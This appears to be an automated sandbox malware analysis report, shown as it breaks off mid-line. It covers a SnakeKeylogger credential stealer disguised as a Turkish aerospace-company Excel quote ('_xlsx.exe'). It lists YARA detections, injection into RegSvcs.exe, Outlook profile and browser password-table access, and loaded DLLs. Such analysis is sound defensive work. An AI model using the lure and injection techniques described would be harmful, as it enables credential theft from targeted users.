                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 2216, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: RegSvcs.exe PID: 4780, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/2@3/3
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_0100A06A GetLastError,FormatMessageW,0_2_0100A06A
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FF81CB AdjustTokenPrivileges,CloseHandle,0_2_00FF81CB
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FF87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00FF87E1
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_0100B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0100B333
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_0101EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0101EE0D
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_0100C397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0100C397
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FA4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00FA4E89
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeFile created: C:\Users\user\AppData\Local\Temp\aut76C8.tmpJump to behavior
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: RegSvcs.exe, 00000002.00000002.3940377959.00000000029BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeReversingLabs: Detection: 34%
                  Source: unknownProcess created: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe"
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe"
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: iconcodecservice.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: wntdll.pdbUGP source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000003.1481254254.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000003.1483312218.0000000003C30000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000003.1481254254.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000003.1483312218.0000000003C30000.00000004.00001000.00020000.00000000.sdmp
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FA4B37 LoadLibraryA,GetProcAddress,0_2_00FA4B37
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FC8945 push ecx; ret 0_2_00FC8958
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeFile created: \tekl#u0130f #u0130ste#u011e#u0130 - tusa#u015e t#u00dcrk havacilik uzay sanay#u0130#u0130_xlsx.exe
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeFile created: \tekl#u0130f #u0130ste#u011e#u0130 - tusa#u015e t#u00dcrk havacilik uzay sanay#u0130#u0130_xlsx.exeJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FA48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00FA48D7
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_01025376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_01025376
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FC3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00FC3187
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeAPI/Special instruction interceptor: Address: 12617CC
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000003.1472935783.0000000001242000.00000004.00000020.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000003.1473680519.000000000129B000.00000004.00000020.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000003.1473188115.000000000129B000.00000004.00000020.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000003.1473053430.000000000129B000.00000004.00000020.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 